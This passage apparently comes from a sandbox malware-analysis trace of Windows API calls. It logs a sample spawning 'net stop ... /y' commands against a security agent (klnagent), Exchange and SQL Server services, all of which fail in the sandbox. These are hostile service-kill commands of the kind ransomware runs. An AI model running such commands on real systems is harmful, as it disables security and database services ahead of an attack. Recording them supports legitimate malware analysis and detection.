cchWideChar=30, lpMultiByteStr=0x2d3fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0198.392] WriteFile (in: hFile=0x26c, lpBuffer=0x2d3fe8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1ffb40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ffb40, lpOverlapped=0x0) returned 0 [0198.392] LocalFree (hMem=0x2d3fe8) returned 0x0 [0198.392] GetFileType (hFile=0x26c) returned 0x3 [0198.392] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2d6290 [0198.392] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2d6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n-", lpUsedDefaultChar=0x0) returned 2 [0198.392] WriteFile (in: hFile=0x26c, lpBuffer=0x2d6290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ffb40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ffb40, lpOverlapped=0x0) returned 0 [0198.392] LocalFree (hMem=0x2d6290) returned 0x0 [0198.392] _ultow (in: _Dest=0x889, _Radix=2095984 | out: _Dest=0x889) returned="2185" [0198.392] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xc5b338, nSize=0x800, Arguments=0xc59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0198.392] GetFileType (hFile=0x26c) returned 0x3 [0198.392] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2d6290 [0198.392] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2d6290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0198.392] WriteFile (in: hFile=0x26c, lpBuffer=0x2d6290, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1ffb4c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ffb4c, lpOverlapped=0x0) returned 0 [0198.392] LocalFree (hMem=0x2d6290) returned 0x0 [0198.392] GetFileType (hFile=0x26c) returned 0x3 [0198.392] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2d6290 [0198.392] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2d6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n-", lpUsedDefaultChar=0x0) returned 2 [0198.392] WriteFile (in: hFile=0x26c, lpBuffer=0x2d6290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ffb4c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ffb4c, lpOverlapped=0x0) returned 0 [0198.392] LocalFree (hMem=0x2d6290) returned 0x0 [0198.393] NetApiBufferFree (Buffer=0x2d1c60) returned 0x0 [0198.393] NetApiBufferFree (Buffer=0x2d1c78) returned 0x0 [0198.393] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop klnagent /y" [0198.393] exit (_Code=2) Process: id = "146" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x58a31000" os_pid = "0xa9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSExchangeSA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 319 os_tid = 0xa4c Process: id = "147" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x57131000" os_pid = "0xaa0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "146" os_parent_pid = "0xa9c" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeSA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 320 os_tid = 0xa48 [0198.522] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfd18 | out: lpSystemTimeAsFileTime=0x1cfd18*(dwLowDateTime=0x3f846300, dwHighDateTime=0x1d57a87)) [0198.523] GetCurrentProcessId () returned 0xaa0 [0198.523] GetCurrentThreadId () returned 0xa48 [0198.523] GetTickCount () returned 0x116b490 [0198.523] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfd10 | out: lpPerformanceCount=0x1cfd10*=31880728579) returned 1 [0198.523] GetModuleHandleA (lpModuleName=0x0) returned 0x1d0000 [0198.523] __set_app_type (_Type=0x1) [0198.523] __p__fmode () returned 0x74eb31f4 [0198.523] __p__commode () returned 0x74eb31fc [0198.523] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1dffe6) returned 0x0 [0198.523] __getmainargs (in: _Argc=0x1e9064, _Argv=0x1e906c, _Env=0x1e9068, _DoWildCard=0, _StartInfo=0x1e9024 | out: _Argc=0x1e9064, _Argv=0x1e906c, _Env=0x1e9068) returned 0 [0198.523] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0198.523] GetConsoleOutputCP () returned 0x1b5 [0198.524] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x1e9080 | out: lpCPInfo=0x1e9080) returned 1 [0198.524] SetThreadUILanguage (LangId=0x0) returned 0x409 [0198.527] sprintf_s (in: _DstBuf=0x1cfcd0, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0198.527] setlocale (category=0, locale=".437") returned="English_United States.437" [0198.529] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0198.529] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0198.529] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeSA /y" [0198.529] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cfa9c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0198.529] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6c) returned 0x533c10 [0198.529] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0198.529] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1cfca0 | out: Buffer=0x1cfca0*=0x531c70) returned 0x0 [0198.530] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1cfca0 | out: Buffer=0x1cfca0*=0x531c88) returned 0x0 [0198.530] _fileno (_File=0x74eb2900) returned -2 [0198.530] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0198.530] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0198.530] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0198.530] _wcsicmp (_String1="config", _String2="stop") returned -16 [0198.530] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0198.530] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0198.530] _wcsicmp (_String1="file", _String2="stop") returned -13 [0198.530] _wcsicmp (_String1="files", _String2="stop") returned -13 [0198.530] _wcsicmp (_String1="group", _String2="stop") returned -12 [0198.530] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0198.530] _wcsicmp (_String1="help", _String2="stop") returned -11 [0198.530] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0198.530] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0198.530] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0198.530] _wcsicmp (_String1="session", _String2="stop") returned -15 [0198.530] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0198.530] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0198.530] _wcsicmp (_String1="share", _String2="stop") returned -12 [0198.530] _wcsicmp (_String1="start", _String2="stop") returned -14 [0198.530] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0198.530] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0198.530] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0198.530] _wcsicmp (_String1="accounts", _String2="MSExchangeSA") returned -12 [0198.530] _wcsicmp (_String1="computer", _String2="MSExchangeSA") returned -10 [0198.530] _wcsicmp (_String1="config", _String2="MSExchangeSA") returned -10 [0198.530] _wcsicmp (_String1="continue", _String2="MSExchangeSA") returned -10 [0198.530] _wcsicmp (_String1="cont", _String2="MSExchangeSA") returned -10 [0198.530] _wcsicmp (_String1="file", _String2="MSExchangeSA") returned -7 [0198.530] _wcsicmp (_String1="files", _String2="MSExchangeSA") returned -7 [0198.530] _wcsicmp (_String1="group", _String2="MSExchangeSA") returned -6 [0198.530] _wcsicmp (_String1="groups", _String2="MSExchangeSA") returned -6 [0198.530] _wcsicmp (_String1="help", _String2="MSExchangeSA") returned -5 [0198.531] _wcsicmp (_String1="helpmsg", _String2="MSExchangeSA") returned -5 [0198.531] _wcsicmp (_String1="localgroup", _String2="MSExchangeSA") returned -1 [0198.531] _wcsicmp (_String1="pause", _String2="MSExchangeSA") returned 3 [0198.531] _wcsicmp (_String1="session", _String2="MSExchangeSA") returned 6 [0198.531] _wcsicmp (_String1="sessions", _String2="MSExchangeSA") returned 6 [0198.531] _wcsicmp (_String1="sess", _String2="MSExchangeSA") returned 6 [0198.531] _wcsicmp (_String1="share", _String2="MSExchangeSA") returned 6 [0198.531] _wcsicmp (_String1="start", _String2="MSExchangeSA") returned 6 [0198.531] _wcsicmp (_String1="stats", _String2="MSExchangeSA") returned 6 [0198.531] _wcsicmp (_String1="statistics", _String2="MSExchangeSA") returned 6 [0198.531] _wcsicmp (_String1="stop", _String2="MSExchangeSA") returned 6 [0198.531] _wcsicmp (_String1="time", _String2="MSExchangeSA") returned 7 [0198.531] _wcsicmp (_String1="user", _String2="MSExchangeSA") returned 8 [0198.531] _wcsicmp (_String1="users", _String2="MSExchangeSA") returned 8 [0198.531] _wcsicmp (_String1="msg", _String2="MSExchangeSA") returned 2 [0198.531] _wcsicmp (_String1="messenger", _String2="MSExchangeSA") returned -14 [0198.531] _wcsicmp (_String1="receiver", _String2="MSExchangeSA") returned 5 [0198.531] _wcsicmp (_String1="rcv", _String2="MSExchangeSA") returned 5 [0198.531] _wcsicmp (_String1="netpopup", _String2="MSExchangeSA") returned 1 [0198.531] _wcsicmp (_String1="redirector", _String2="MSExchangeSA") returned 5 [0198.531] _wcsicmp (_String1="redir", _String2="MSExchangeSA") returned 5 [0198.531] _wcsicmp (_String1="rdr", _String2="MSExchangeSA") returned 5 [0198.531] _wcsicmp (_String1="workstation", _String2="MSExchangeSA") returned 10 [0198.531] _wcsicmp (_String1="work", _String2="MSExchangeSA") returned 10 [0198.531] _wcsicmp (_String1="wksta", _String2="MSExchangeSA") returned 10 [0198.531] _wcsicmp (_String1="prdr", _String2="MSExchangeSA") returned 3 [0198.531] _wcsicmp (_String1="devrdr", _String2="MSExchangeSA") returned -9 [0198.531] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeSA") returned -1 [0198.531] _wcsicmp (_String1="server", _String2="MSExchangeSA") returned 6 [0198.531] _wcsicmp (_String1="svr", _String2="MSExchangeSA") returned 6 [0198.531] _wcsicmp (_String1="srv", _String2="MSExchangeSA") returned 6 [0198.531] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeSA") returned -1 [0198.531] _wcsicmp (_String1="alerter", _String2="MSExchangeSA") returned -12 [0198.531] _wcsicmp (_String1="netlogon", _String2="MSExchangeSA") returned 1 [0198.532] _wcsupr (in: _String="MSExchangeSA" | out: _String="MSEXCHANGESA") returned="MSEXCHANGESA" [0198.532] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5354d0 [0198.534] GetServiceKeyNameW (in: hSCManager=0x5354d0, lpDisplayName="MSEXCHANGESA", lpServiceName=0x1eaaf0, lpcchBuffer=0x1cfc3c | out: lpServiceName="", lpcchBuffer=0x1cfc3c) returned 0 [0198.535] _wcsicmp (_String1="msg", _String2="MSEXCHANGESA") returned 2 [0198.535] _wcsicmp (_String1="messenger", _String2="MSEXCHANGESA") returned -14 [0198.535] _wcsicmp (_String1="receiver", _String2="MSEXCHANGESA") returned 5 [0198.535] _wcsicmp (_String1="rcv", _String2="MSEXCHANGESA") returned 5 [0198.535] _wcsicmp (_String1="redirector", _String2="MSEXCHANGESA") returned 5 [0198.535] _wcsicmp (_String1="redir", _String2="MSEXCHANGESA") returned 5 [0198.535] _wcsicmp (_String1="rdr", _String2="MSEXCHANGESA") returned 5 [0198.535] _wcsicmp (_String1="workstation", _String2="MSEXCHANGESA") returned 10 [0198.535] _wcsicmp (_String1="work", _String2="MSEXCHANGESA") returned 10 [0198.535] _wcsicmp (_String1="wksta", _String2="MSEXCHANGESA") returned 10 [0198.535] _wcsicmp (_String1="prdr", _String2="MSEXCHANGESA") returned 3 [0198.535] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGESA") returned -9 [0198.535] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGESA") returned -1 [0198.535] _wcsicmp (_String1="server", _String2="MSEXCHANGESA") returned 6 [0198.535] _wcsicmp (_String1="svr", _String2="MSEXCHANGESA") returned 6 [0198.535] _wcsicmp (_String1="srv", _String2="MSEXCHANGESA") returned 6 [0198.535] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGESA") returned -1 [0198.535] _wcsicmp (_String1="alerter", _String2="MSEXCHANGESA") returned -12 [0198.535] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGESA") returned 1 [0198.535] NetServiceControl (in: servername=0x0, service="MSEXCHANGESA", opcode=0x0, arg=0x0, bufptr=0x1cfc38 | out: bufptr=0x1cfc38) returned 0x889 [0198.536] wcscpy_s (in: _Destination=0x1ea4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0198.536] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0198.537] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x1eb338, nSize=0x800, Arguments=0x1e9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0198.538] GetFileType (hFile=0x26c) returned 0x3 [0198.538] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x534000 [0198.538] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x534000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0198.538] WriteFile (in: hFile=0x26c, lpBuffer=0x534000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1cfb78, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cfb78, lpOverlapped=0x0) returned 0 [0198.538] LocalFree (hMem=0x534000) returned 0x0 [0198.538] GetFileType (hFile=0x26c) returned 0x3 [0198.538] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5362a8 [0198.538] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5362a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nS", lpUsedDefaultChar=0x0) returned 2 [0198.538] WriteFile (in: hFile=0x26c, lpBuffer=0x5362a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1cfb78, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cfb78, lpOverlapped=0x0) returned 0 [0198.538] LocalFree (hMem=0x5362a8) returned 0x0 [0198.538] _ultow (in: _Dest=0x889, _Radix=1899432 | out: _Dest=0x889) returned="2185" [0198.538] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x1eb338, nSize=0x800, Arguments=0x1e9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0198.538] GetFileType (hFile=0x26c) returned 0x3 [0198.538] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5362a8 [0198.538] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5362a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0198.539] WriteFile (in: hFile=0x26c, lpBuffer=0x5362a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1cfb84, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cfb84, lpOverlapped=0x0) returned 0 [0198.539] LocalFree (hMem=0x5362a8) returned 0x0 [0198.539] GetFileType (hFile=0x26c) returned 0x3 [0198.539] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5362a8 [0198.539] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5362a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nS", lpUsedDefaultChar=0x0) returned 2 [0198.539] WriteFile (in: hFile=0x26c, lpBuffer=0x5362a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1cfb84, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cfb84, lpOverlapped=0x0) returned 0 [0198.539] LocalFree (hMem=0x5362a8) returned 0x0 [0198.539] NetApiBufferFree (Buffer=0x531c70) returned 0x0 [0198.539] NetApiBufferFree (Buffer=0x531c88) returned 0x0 [0198.539] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeSA /y" [0198.540] exit (_Code=2) Process: id = "148" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x50d36000" os_pid = "0xa20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQLServerADHelper /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 321 os_tid = 0xaa4 Process: id = "149" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5094d000" os_pid = "0x730" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "148" os_parent_pid = "0xa20" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLServerADHelper /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 322 os_tid = 0x750 [0198.670] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x15f8b8 | out: lpSystemTimeAsFileTime=0x15f8b8*(dwLowDateTime=0x3f9c30c0, dwHighDateTime=0x1d57a87)) [0198.670] GetCurrentProcessId () returned 0x730 [0198.670] GetCurrentThreadId () returned 0x750 [0198.670] GetTickCount () returned 0x116b52c [0198.670] QueryPerformanceCounter (in: lpPerformanceCount=0x15f8b0 | out: lpPerformanceCount=0x15f8b0*=31895439330) returned 1 [0198.670] GetModuleHandleA (lpModuleName=0x0) returned 0xdb0000 [0198.670] __set_app_type (_Type=0x1) [0198.670] __p__fmode () returned 0x74eb31f4 [0198.670] __p__commode () returned 0x74eb31fc [0198.670] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xdbffe6) returned 0x0 [0198.670] __getmainargs (in: _Argc=0xdc9064, _Argv=0xdc906c, _Env=0xdc9068, _DoWildCard=0, _StartInfo=0xdc9024 | out: _Argc=0xdc9064, _Argv=0xdc906c, _Env=0xdc9068) returned 0 [0198.670] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0198.671] GetConsoleOutputCP () returned 0x1b5 [0198.671] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xdc9080 | out: lpCPInfo=0xdc9080) returned 1 [0198.671] SetThreadUILanguage (LangId=0x0) returned 0x409 [0198.674] sprintf_s (in: _DstBuf=0x15f870, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0198.674] setlocale (category=0, locale=".437") returned="English_United States.437" [0198.676] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0198.676] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0198.676] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLServerADHelper /y" [0198.676] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x15f63c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0198.676] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x7a) returned 0x593c20 [0198.676] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0198.676] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x15f840 | out: Buffer=0x15f840*=0x591c80) returned 0x0 [0198.676] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x15f840 | out: Buffer=0x15f840*=0x591c98) returned 0x0 [0198.676] _fileno (_File=0x74eb2900) returned -2 [0198.676] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0198.676] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0198.676] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0198.676] _wcsicmp (_String1="config", _String2="stop") returned -16 [0198.676] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0198.677] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0198.677] _wcsicmp (_String1="file", _String2="stop") returned -13 [0198.677] _wcsicmp (_String1="files", _String2="stop") returned -13 [0198.677] _wcsicmp (_String1="group", _String2="stop") returned -12 [0198.677] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0198.677] _wcsicmp (_String1="help", _String2="stop") returned -11 [0198.677] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0198.677] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0198.677] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0198.677] _wcsicmp (_String1="session", _String2="stop") returned -15 [0198.677] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0198.677] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0198.677] _wcsicmp (_String1="share", _String2="stop") returned -12 [0198.677] _wcsicmp (_String1="start", _String2="stop") returned -14 [0198.677] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0198.677] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0198.677] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0198.677] _wcsicmp (_String1="accounts", _String2="MSSQLServerADHelper") returned -12 [0198.677] _wcsicmp (_String1="computer", _String2="MSSQLServerADHelper") returned -10 [0198.677] _wcsicmp (_String1="config", _String2="MSSQLServerADHelper") returned -10 [0198.677] _wcsicmp (_String1="continue", _String2="MSSQLServerADHelper") returned -10 [0198.677] _wcsicmp (_String1="cont", _String2="MSSQLServerADHelper") returned -10 [0198.677] _wcsicmp (_String1="file", _String2="MSSQLServerADHelper") returned -7 [0198.677] _wcsicmp (_String1="files", _String2="MSSQLServerADHelper") returned -7 [0198.677] _wcsicmp (_String1="group", _String2="MSSQLServerADHelper") returned -6 [0198.677] _wcsicmp (_String1="groups", _String2="MSSQLServerADHelper") returned -6 [0198.677] _wcsicmp (_String1="help", _String2="MSSQLServerADHelper") returned -5 [0198.677] _wcsicmp (_String1="helpmsg", _String2="MSSQLServerADHelper") returned -5 [0198.677] _wcsicmp (_String1="localgroup", _String2="MSSQLServerADHelper") returned -1 [0198.677] _wcsicmp (_String1="pause", _String2="MSSQLServerADHelper") returned 3 [0198.677] _wcsicmp (_String1="session", _String2="MSSQLServerADHelper") returned 6 [0198.677] _wcsicmp (_String1="sessions", _String2="MSSQLServerADHelper") returned 6 [0198.677] _wcsicmp (_String1="sess", _String2="MSSQLServerADHelper") returned 6 [0198.677] _wcsicmp (_String1="share", _String2="MSSQLServerADHelper") returned 6 [0198.677] _wcsicmp (_String1="start", _String2="MSSQLServerADHelper") returned 6 [0198.677] _wcsicmp (_String1="stats", _String2="MSSQLServerADHelper") returned 6 [0198.677] _wcsicmp (_String1="statistics", _String2="MSSQLServerADHelper") returned 6 [0198.678] _wcsicmp (_String1="stop", _String2="MSSQLServerADHelper") returned 6 [0198.678] _wcsicmp (_String1="time", _String2="MSSQLServerADHelper") returned 7 [0198.678] _wcsicmp (_String1="user", _String2="MSSQLServerADHelper") returned 8 [0198.678] _wcsicmp (_String1="users", _String2="MSSQLServerADHelper") returned 8 [0198.678] _wcsicmp (_String1="msg", _String2="MSSQLServerADHelper") returned -12 [0198.678] _wcsicmp (_String1="messenger", _String2="MSSQLServerADHelper") returned -14 [0198.678] _wcsicmp (_String1="receiver", _String2="MSSQLServerADHelper") returned 5 [0198.678] _wcsicmp (_String1="rcv", _String2="MSSQLServerADHelper") returned 5 [0198.678] _wcsicmp (_String1="netpopup", _String2="MSSQLServerADHelper") returned 1 [0198.678] _wcsicmp (_String1="redirector", _String2="MSSQLServerADHelper") returned 5 [0198.678] _wcsicmp (_String1="redir", _String2="MSSQLServerADHelper") returned 5 [0198.678] _wcsicmp (_String1="rdr", _String2="MSSQLServerADHelper") returned 5 [0198.678] _wcsicmp (_String1="workstation", _String2="MSSQLServerADHelper") returned 10 [0198.678] _wcsicmp (_String1="work", _String2="MSSQLServerADHelper") returned 10 [0198.678] _wcsicmp (_String1="wksta", _String2="MSSQLServerADHelper") returned 10 [0198.678] _wcsicmp (_String1="prdr", _String2="MSSQLServerADHelper") returned 3 [0198.678] _wcsicmp (_String1="devrdr", _String2="MSSQLServerADHelper") returned -9 [0198.678] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLServerADHelper") returned -1 [0198.678] _wcsicmp (_String1="server", _String2="MSSQLServerADHelper") returned 6 [0198.678] _wcsicmp (_String1="svr", _String2="MSSQLServerADHelper") returned 6 [0198.678] _wcsicmp (_String1="srv", _String2="MSSQLServerADHelper") returned 6 [0198.678] _wcsicmp (_String1="lanmanserver", _String2="MSSQLServerADHelper") returned -1 [0198.678] _wcsicmp (_String1="alerter", _String2="MSSQLServerADHelper") returned -12 [0198.678] _wcsicmp (_String1="netlogon", _String2="MSSQLServerADHelper") returned 1 [0198.678] _wcsupr (in: _String="MSSQLServerADHelper" | out: _String="MSSQLSERVERADHELPER") returned="MSSQLSERVERADHELPER" [0198.678] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5954f0 [0198.681] GetServiceKeyNameW (in: hSCManager=0x5954f0, lpDisplayName="MSSQLSERVERADHELPER", lpServiceName=0xdcaaf0, 